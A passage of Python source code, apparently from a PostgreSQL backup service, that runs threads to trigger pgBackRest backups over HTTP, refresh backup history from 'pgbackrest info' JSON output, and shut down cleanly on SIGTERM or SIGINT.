while not shutdown_trigger.is_set():
# This can probably be done more perfectly, but by sleeping 1 second we ensure 2 things:
# - backups can be identified by their timestamp with a resolution of 1 second
# - if there are any errors in the backup logic, we will not burn a single CPU in the while loop
time.sleep(1)
try:
logging.debug('Waiting until backup triggered')
backup_trigger.wait()
if shutdown_trigger.is_set():
break
current_backup.run()
history_trigger.set()
backup_trigger.clear()
except Exception as e:
logging.error(e)
# The currently running backup failed, we should clear the backup trigger
# so a next backup can be started
backup_trigger.clear()
logging.warning('Shutting down thread')
def history_refresher(history_trigger, shutdown_trigger, interval):
"""Refresh backup history regularly from pgBackRest
    Will refresh the history when triggered, or when a timeout occurs.
After the first pgBackRest run, this should show the history as it is known by
pgBackRest.
As the backup repository is supposed to be in S3, this means that calling the API
to get information about the backup history should show you all the backups of all
the pods, not just the backups of this pod.
For details on what pgBackRest returns:
https://pgbackrest.org/command.html#command-info/category-command/option-output
"""
global backup_history, stanza
while not shutdown_trigger.is_set():
time.sleep(1)
try:
history_trigger.wait(timeout=interval)
if shutdown_trigger.is_set():
break
logging.info('Refreshing backup history using pgbackrest')
pgbackrest_out = check_output(['pgbackrest', '--stanza={0}'.format(stanza), 'info', '--output=json']).decode("utf-8")
for b in backup_history.values():
b.pgbackrest_info.clear()
backup_info = json.loads(pgbackrest_out)
if backup_info:
for b in backup_info[0].get('backup', []):
pgb = PostgreSQLBackup(
stanza=stanza,
request=None,
started=EPOCH + datetime.timedelta(seconds=b['timestamp']['start']),
finished=EPOCH + datetime.timedelta(seconds=b['timestamp']['stop']),
status='FINISHED'
)
backup_history.setdefault(pgb.label, pgb)
backup_history[pgb.label].pgbackrest_info.update(b)
# This thread should keep running, as it only triggers backups. Therefore we catch
# all errors and log them, but The Thread Must Go On
except Exception as e:
logging.exception(e)
finally:
history_trigger.clear()
logging.warning('Shutting down thread')
def main(args):
"""This is the core program
To aid in testing this, we expect args to be a dictionary with already parsed options"""
global stanza
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(threadName)s - %(message)s', level=LOGLEVELS[args['loglevel'].lower()])
stanza = args['stanza']
shutdown_trigger = Event()
backup_trigger = Event()
history_trigger = Event()
backup_thread = Thread(target=backup_poller, args=(backup_trigger, history_trigger, shutdown_trigger), name='backup')
history_thread = Thread(target=history_refresher, name='history', args=(history_trigger, shutdown_trigger, 3600))
server_address = ('', args['port'])
httpd = EventHTTPServer(backup_trigger, server_address, RequestHandler)
httpd_thread = Thread(target=httpd.serve_forever, name='http')
# For cleanup, we will trigger all events when signaled, all the threads
# will investigate the shutdown trigger before acting on their individual
# triggers
def sigterm_handler(_signo, _stack_frame):
logging.warning('Received kill {0}, shutting down'.format(_signo))
shutdown_trigger.set()
backup_trigger.set()
history_trigger.set()
httpd.shutdown()
while backup_thread.is_alive() or history_thread.is_alive() or httpd_thread.is_alive():
time.sleep(1)
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
backup_thread.start()
history_trigger.set()
history_thread.start()
httpd_thread.start()
if __name__ == '__main__':
main(vars(parse_arguments(sys.argv[1:])))
|